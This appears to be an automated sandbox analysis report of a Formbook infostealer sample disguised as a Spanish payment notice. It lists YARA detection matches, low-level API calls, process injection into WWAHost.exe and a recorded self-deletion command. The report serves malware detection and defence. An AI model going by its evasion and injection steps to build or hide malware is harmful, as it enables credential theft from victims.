          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: Notificaci#U00f3n de pago.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0395B150 appears 35 times
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A310 NtCreateFile,8_2_0041A310
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A3C0 NtReadFile,8_2_0041A3C0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A440 NtClose,8_2_0041A440
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4F0 NtAllocateVirtualMemory,8_2_0041A4F0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A362 NtCreateFile,8_2_0041A362
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A30A NtCreateFile,8_2_0041A30A
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A3BA NtReadFile,8_2_0041A3BA
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A43B NtClose,8_2_0041A43B
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4EA NtAllocateVirtualMemory,8_2_0041A4EA
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4F4 NtAllocateVirtualMemory,8_2_0041A4F4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A50 NtCreateFile,LdrInitializeThunk,14_2_03999A50
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039999A0 NtCreateSection,LdrInitializeThunk,14_2_039999A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_03999910
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999840 NtDelayExecution,LdrInitializeThunk,14_2_03999840
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999860 NtQuerySystemInformation,LdrInitializeThunk,14_2_03999860
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999780 NtMapViewOfSection,LdrInitializeThunk,14_2_03999780
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999FE0 NtCreateMutant,LdrInitializeThunk,14_2_03999FE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999710 NtQueryInformationToken,LdrInitializeThunk,14_2_03999710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039996D0 NtCreateKey,LdrInitializeThunk,14_2_039996D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039996E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_039996E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999650 NtQueryValueKey,LdrInitializeThunk,14_2_03999650
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_03999660
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039995D0 NtClose,LdrInitializeThunk,14_2_039995D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999540 NtReadFile,LdrInitializeThunk,14_2_03999540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A3B0 NtGetContextThread,14_2_0399A3B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999B00 NtSetValueKey,14_2_03999B00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A80 NtOpenDirectoryObject,14_2_03999A80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A10 NtQuerySection,14_2_03999A10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A00 NtProtectVirtualMemory,14_2_03999A00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A20 NtResumeThread,14_2_03999A20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039999D0 NtCreateProcessEx,14_2_039999D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999950 NtQueueApcThread,14_2_03999950
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039998A0 NtWriteVirtualMemory,14_2_039998A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039998F0 NtReadVirtualMemory,14_2_039998F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999820 NtEnumerateKey,14_2_03999820
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399B040 NtSuspendThread,14_2_0399B040
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039997A0 NtUnmapViewOfSection,14_2_039997A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A710 NtOpenProcessToken,14_2_0399A710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999730 NtQueryVirtualMemory,14_2_03999730
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A770 NtOpenThread,14_2_0399A770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999770 NtSetInformationFile,14_2_03999770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999760 NtOpenProcess,14_2_03999760
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999610 NtEnumerateValueKey,14_2_03999610
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999670 NtQueryInformationProcess,14_2_03999670
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039995F0 NtQueryInformationFile,14_2_039995F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399AD30 NtSetContextThread,14_2_0399AD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999520 NtWaitForSingleObject,14_2_03999520
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999560 NtWriteFile,14_2_03999560
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A3C0 NtReadFile,14_2_00A7A3C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A310 NtCreateFile,14_2_00A7A310
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4F0 NtAllocateVirtualMemory,14_2_00A7A4F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A440 NtClose,14_2_00A7A440
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A3BA NtReadFile,14_2_00A7A3BA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A30A NtCreateFile,14_2_00A7A30A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A362 NtCreateFile,14_2_00A7A362
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4EA NtAllocateVirtualMemory,14_2_00A7A4EA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4F4 NtAllocateVirtualMemory,14_2_00A7A4F4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A43B NtClose,14_2_00A7A43B
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.314207449.0000000007930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.308434377.0000000000C16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000000.303233250.0000000000E96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.381717233.00000000039B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.385915801.0000000001CFF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386824949.00000000038D6000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.306954207.0000000001830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.308930393.00000000019D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exeBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Notificaci#U00f3n de pago.exeVirustotal: Detection: 21%
          Source: Notificaci#U00f3n de pago.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Notificaci#U00f3n de pago.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Notificaci#U00f3n de pago.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Notificaci#U00f3n de pago.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Notificaci#U00f3n de pago.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: WWAHost.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
